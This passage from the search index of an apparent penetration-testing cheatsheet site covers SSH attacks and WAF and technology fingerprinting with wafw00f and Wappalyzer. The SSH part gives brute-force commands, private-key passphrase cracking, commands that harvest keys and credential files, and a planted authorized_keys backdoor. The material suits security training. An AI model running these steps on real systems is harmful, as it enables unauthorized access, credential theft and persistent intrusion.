\u0026lt;user\u0026gt; -P wordlist.txt ssh://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt ssh://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e2222\u003c/span\u003e ssh://\u0026lt;ip\u0026gt;    \u003cspan style=\"color:#75715e\"\u003e# Custom port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Medusa\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emedusa -h \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -P wordlist.txt -M ssh\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Nmap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-brute \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --script-args userdb\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eusers.txt,passdb\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003epass.txt \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/ssh/ssh_login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset USERNAME 
\u0026lt;user\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset PASS_FILE wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-based-attacks\"\u003eKey-Based Attacks\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect with private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003echmod \u003cspan style=\"color:#ae81ff\"\u003e600\u003c/span\u003e id_rsa \u003cspan style=\"color:#f92672\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e ssh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Crack passphrase on private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh2john id_rsa \u0026gt; ssh_hash.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ejohn ssh_hash.txt --wordlist\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003ewordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehashcat -m \u003cspan 
style=\"color:#ae81ff\"\u003e22921\u003c/span\u003e ssh_hash.txt wordlist.txt    \u003cspan style=\"color:#75715e\"\u003e# Ed25519\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehashcat -m \u003cspan style=\"color:#ae81ff\"\u003e22911\u003c/span\u003e ssh_hash.txt wordlist.txt    \u003cspan style=\"color:#75715e\"\u003e# RSA\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scan for keys (key harvesting after initial access)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efind / -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;id_rsa\u0026#34;\u003c/span\u003e -o -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;id_ecdsa\u0026#34;\u003c/span\u003e -o -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;id_ed25519\u0026#34;\u003c/span\u003e 2\u0026gt;/dev/null\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efind / -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;*.pem\u0026#34;\u003c/span\u003e -o -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;*.key\u0026#34;\u003c/span\u003e 2\u0026gt;/dev/null\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-key-scanning\"\u003eSSH Key Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Collect host keys\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan -t rsa,ecdsa,ed25519 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan -p \u003cspan style=\"color:#ae81ff\"\u003e2222\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scan range\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan -f hosts.txt \u0026gt; known_hosts\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"interesting-files-to-grab-post-access\"\u003eInteresting Files to Grab Post-Access\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/id_rsa                  \u003cspan style=\"color:#75715e\"\u003e# Private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/id_rsa.pub              \u003cspan style=\"color:#75715e\"\u003e# Public key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/authorized_keys         \u003cspan style=\"color:#75715e\"\u003e# Authorized keys (add yours for persistence)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/known_hosts             \u003cspan style=\"color:#75715e\"\u003e# 
Previous connections (network map)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/etc/ssh/sshd_config           \u003cspan style=\"color:#75715e\"\u003e# Server configuration\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/etc/ssh/ssh_host_rsa_key      \u003cspan style=\"color:#75715e\"\u003e# Host private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"add-backdoor-ssh-key-post-exploitation\"\u003eAdd Backdoor SSH Key (Post-Exploitation)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# On attacker machine\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keygen -t rsa -b \u003cspan style=\"color:#ae81ff\"\u003e4096\u003c/span\u003e -f backdoor\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# On target (append to authorized_keys)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eecho \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;ssh-rsa AAAA...\u0026#34;\u003c/span\u003e \u0026gt;\u0026gt; ~/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003echmod \u003cspan style=\"color:#ae81ff\"\u003e600\u003c/span\u003e ~/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect back\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -i backdoor \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-misconfigurations-to-check\"\u003eCommon Misconfigurations to Check\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ePermitRootLogin yes           — Root login allowed\nPasswordAuthentication yes    — Passwords accepted (brutable)\nPermitEmptyPasswords yes      — Blank passwords allowed\nAuthorizedKeysFile .ssh/authorized_keys  — Key auth path\nAllowUsers / DenyUsers        — User restrictions\nPort 22                       — Non-standard port may indicate stealth\n\u003c/code\u003e\u003c/pre\u003e","title":"SSH"},{"content":"wafw00f Cheatsheet Purpose: Identify and fingerprint Web Application Firewalls (WAFs) protecting a target web app.\nBasic Usage wafw00f \u0026lt;url\u0026gt; # Scan a single target wafw00f https://example.com # HTTPS target wafw00f example.com -v # Verbose output wafw00f example.com -vv # Extra verbose (debug) Common Flags Flag Description -v / -vv Verbose / very verbose output -a Find ALL WAFs (don\u0026rsquo;t stop at first match) -r Disable HTTP redirect following -t \u0026lt;waf\u0026gt; Test only for a specific WAF -o \u0026lt;file\u0026gt; Write results to file -f \u0026lt;format\u0026gt; Output format: csv, json, text -i \u0026lt;file\u0026gt; Read targets from input file -p \u0026lt;proxy\u0026gt; Use proxy (e.g. 
http://127.0.0.1:8080) -T \u0026lt;n\u0026gt; Set request timeout (seconds) -H \u0026lt;file\u0026gt; Use custom headers from file -l List all WAFs it can detect --no-colors Disable ANSI colored output Listing \u0026amp; Targeted Detection wafw00f -l # List supported WAFs wafw00f example.com -t \u0026#34;Cloudflare (Cloudflare Inc.)\u0026#34; wafw00f example.com -a # Detect every WAF in chain Bulk Scanning wafw00f -i targets.txt -o results.json -f json wafw00f -i urls.txt -a -o waf-report.csv -f csv Routing Through a Proxy (Burp / ZAP) wafw00f https://target.tld -p http://127.0.0.1:8080 Custom Headers File Example headers.txt:\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) Recon/1.0 X-Forwarded-For: 127.0.0.1 wafw00f example.com -H headers.txt -v Interpreting Results \u0026ldquo;is behind \u0026rdquo; — confident detection via signature. \u0026ldquo;seems to be behind a WAF or some sort of security solution\u0026rdquo; — generic block detected, no fingerprint match. \u0026ldquo;No WAF detected\u0026rdquo; — either no WAF, or WAF is in passive/learning mode. Tips Run -a if a CDN WAF (Cloudflare, Akamai) may be stacked over an origin WAF (ModSecurity, F5). Combine with nikto and whatweb — WAF presence changes how aggressively you should scan. WAF detected ≠ scan blocked. Throttle scans and consider source IP rotation. If results are inconsistent, retry with -r (no redirects) — some WAFs only trigger on the final URL. 
","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/wafw00f/","summary":"\u003ch1 id=\"wafw00f-cheatsheet\"\u003ewafw00f Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Identify and fingerprint Web Application Firewalls (WAFs) protecting a target web app.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f \u0026lt;url\u0026gt;                          \u003cspan style=\"color:#75715e\"\u003e# Scan a single target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f https://example.com            \u003cspan style=\"color:#75715e\"\u003e# HTTPS target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -v                 \u003cspan style=\"color:#75715e\"\u003e# Verbose output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -vv                \u003cspan style=\"color:#75715e\"\u003e# Extra verbose (debug)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e / 
\u003ccode\u003e-vv\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose / very verbose output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFind ALL WAFs (don\u0026rsquo;t stop at first match)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable HTTP redirect following\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;waf\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTest only for a specific WAF\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite results to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-f \u0026lt;format\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format: \u003ccode\u003ecsv\u003c/code\u003e, \u003ccode\u003ejson\u003c/code\u003e, \u003ccode\u003etext\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRead targets from input file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;proxy\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy (e.g. 
\u003ccode\u003ehttp://127.0.0.1:8080\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet request timeout (seconds)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse custom headers from file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-l\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList all WAFs it can detect\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--no-colors\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable ANSI colored output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"listing--targeted-detection\"\u003eListing \u0026amp; Targeted Detection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f -l                             \u003cspan style=\"color:#75715e\"\u003e# List supported WAFs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -t \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Cloudflare (Cloudflare Inc.)\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -a                 \u003cspan style=\"color:#75715e\"\u003e# Detect every WAF in 
chain\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"bulk-scanning\"\u003eBulk Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f -i targets.txt -o results.json -f json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f -i urls.txt -a -o waf-report.csv -f csv\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"routing-through-a-proxy-burp--zap\"\u003eRouting Through a Proxy (Burp / ZAP)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f https://target.tld -p http://127.0.0.1:8080\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"custom-headers-file-example\"\u003eCustom Headers File Example\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eheaders.txt\u003c/code\u003e:\u003c/p\u003e","title":"wafw00f"},{"content":"Wappalyzer Cheatsheet Purpose: Identify web technologies — CMS, frameworks, JS libraries, analytics, ecommerce, CDNs — from response headers, HTML, cookies, scripts, and DOM.\nNote: Wappalyzer is primarily a browser extension and web service. 
The original CLI/NPM package was deprecated; community forks still exist.\nAccess Points Surface URL / Source Browser extension (Chrome / Firefox / Edge) https://www.wappalyzer.com/apps/ Web lookup (single URL) https://www.wappalyzer.com/lookup/ API / bulk lookups (paid) https://www.wappalyzer.com/api/ Legacy NPM CLI (deprecated, archived) npm i -g wappalyzer Community fork (Webappalyzer) https://github.com/enthec/webappanalyzer Browser Extension Workflow Install extension; pin to toolbar. Navigate to target. Click the icon — categories light up: CMS, Web frameworks, JS libs, Analytics, Web servers, Tag managers, CDN, Ecommerce, Payment processors, Font scripts, Issue trackers, etc. Click a detected tech for vendor links and version info (when available). Stealth value: all detection runs in your browser against an already-loaded page → no extra requests to the target.\nLegacy CLI (archived, may not install on modern Node) npm i -g wappalyzer wappalyzer https://target.tld # JSON to stdout wappalyzer https://target.tld --pretty # Indented JSON wappalyzer https://target.tld --recursive --depth=2 # Crawl wappalyzer https://target.tld --user-agent \u0026#34;Recon/1.0\u0026#34; wappalyzer https://target.tld --proxy http://127.0.0.1:8080 Useful flags (legacy):\nFlag Description --pretty Pretty-print JSON --recursive Crawl links on the same domain --depth=\u0026lt;n\u0026gt; Crawl depth --max-urls=\u0026lt;n\u0026gt; Cap URL count --user-agent \u0026lt;ua\u0026gt; Custom UA --proxy \u0026lt;url\u0026gt; Route through proxy --no-scripts Skip JS evaluation Web Lookup (no install) https://www.wappalyzer.com/lookup/\u0026lt;domain\u0026gt; Use when you can\u0026rsquo;t install the extension (locked workstation, throwaway VM). 
Result mirrors what the extension shows.\nData It Reveals CMS + version (WordPress, Drupal, Joomla, Ghost, …) Web servers (Nginx, Apache, IIS, LiteSpeed) Application servers / frameworks (Laravel, Django, Rails, ASP.NET, Express, Next.js) JS frameworks \u0026amp; UI libs (React, Vue, Angular, jQuery, Svelte) Tag managers / analytics (GTM, GA, Matomo, Hotjar) CDNs (Cloudflare, Akamai, Fastly, CloudFront) Ecommerce platforms (Shopify, Magento, WooCommerce) Payment processors, search platforms, A/B tools, CRMs Tips Extension uses page DOM + already-fetched assets → no extra noise on the target. Cross-check with whatweb -a 3 from a CLI host; Wappalyzer and WhatWeb miss different things. For bulk programmatic detection prefer WhatWeb (free, scriptable) or Wappalyzer\u0026rsquo;s paid API. Versions reported via JS globals / generator meta — confirm with curl -sI or by fetching a known asset path (/wp-includes/, /sites/default/files/). Useful for OSINT recon before engagement — runs entirely in your browser. Related [[whatweb]] — scriptable equivalent for CLI / pipelines. [[builtwith]] — historical tech profile for the domain. [[wafw00f]] — companion for WAF detection. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/wappalyzer/","summary":"\u003ch1 id=\"wappalyzer-cheatsheet\"\u003eWappalyzer Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Identify web technologies — CMS, frameworks, JS libraries, analytics, ecommerce, CDNs — from response headers, HTML, cookies, scripts, and DOM.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e Wappalyzer is primarily a \u003cstrong\u003ebrowser extension\u003c/strong\u003e and \u003cstrong\u003eweb service\u003c/strong\u003e. 
The original CLI/NPM package was deprecated; community forks still exist.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"access-points\"\u003eAccess Points\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSurface\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eURL / Source\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eBrowser extension (Chrome / Firefox / Edge)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.wappalyzer.com/apps/\"\u003ehttps://www.wappalyzer.com/apps/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eWeb lookup (single URL)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.wappalyzer.com/lookup/\"\u003ehttps://www.wappalyzer.com/lookup/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAPI / bulk lookups (paid)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.wappalyzer.com/api/\"\u003ehttps://www.wappalyzer.com/api/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eLegacy NPM CLI (deprecated, archived)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003enpm i -g wappalyzer\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCommunity fork (Webappalyzer)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://github.com/enthec/webappanalyzer\"\u003ehttps://github.com/enthec/webappanalyzer\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"browser-extension-workflow\"\u003eBrowser Extension Workflow\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInstall extension; pin to toolbar.\u003c/li\u003e\n\u003cli\u003eNavigate to target.\u003c/li\u003e\n\u003cli\u003eClick the icon — categories light up: 
